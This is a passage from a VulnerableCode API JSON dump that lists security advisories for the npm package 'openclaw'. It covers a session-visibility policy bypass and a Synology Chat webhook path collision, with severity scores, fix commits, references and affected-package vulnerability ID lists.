            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "GHSA-57gh-m6rq-54cf"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x794-wfnf-1ugf"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89234?format=api",
            "vulnerability_id": "VCID-x7uw-s9a6-fybd",
            "summary": "OpenClaw: `session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations\n## Summary\n`session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real on shipped v2026.3.22: non-sandboxed session_status skipped the shared visibility guard, but this is a same-agent session-policy bypass with unreleased fix, not a broader host-boundary break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d369a3400dc9b737fbe8daa63f09d909ce7beb8` — 2026-03-30T16:48:12+02:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4d369a3400dc9b737fbe8daa63f09d909ce7beb8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4d369a3400dc9b737fbe8daa63f09d909ce7beb8"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fwjq-xwfj-gv75",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fwjq-xwfj-gv75"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fwjq-xwfj-gv75",
                    "reference_id": "GHSA-fwjq-xwfj-gv75",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fwjq-xwfj-gv75"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "GHSA-fwjq-xwfj-gv75"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x7uw-s9a6-fybd"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91235?format=api",
            "vulnerability_id": "VCID-x9qg-8qk5-s3d6",
            "summary": "OpenClaw Bypasses DM Policy Separation via Synology Chat Webhook Path Collision\n## Summary\nSynology Chat multi-account configuration could collapse onto a shared webhook path, replacing route ownership and bypassing per-account DM policy separation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `980940aa58f862da4e19372597bbc2a9f268d70b`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/synology-chat/src/accounts.ts now distinguishes inherited base webhook paths from explicit per-account paths.\n- extensions/synology-chat/src/gateway-runtime.ts now fails closed on inherited or duplicate webhook paths and registers routes without replacement.\n\nOpenClaw thanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35635",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13338",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.133",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00042",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13342",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35635"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35635",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35635"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rqp8-q22p-5j9q",
                    "reference_id": "GHSA-rqp8-q22p-5j9q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rqp8-q22p-5j9q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
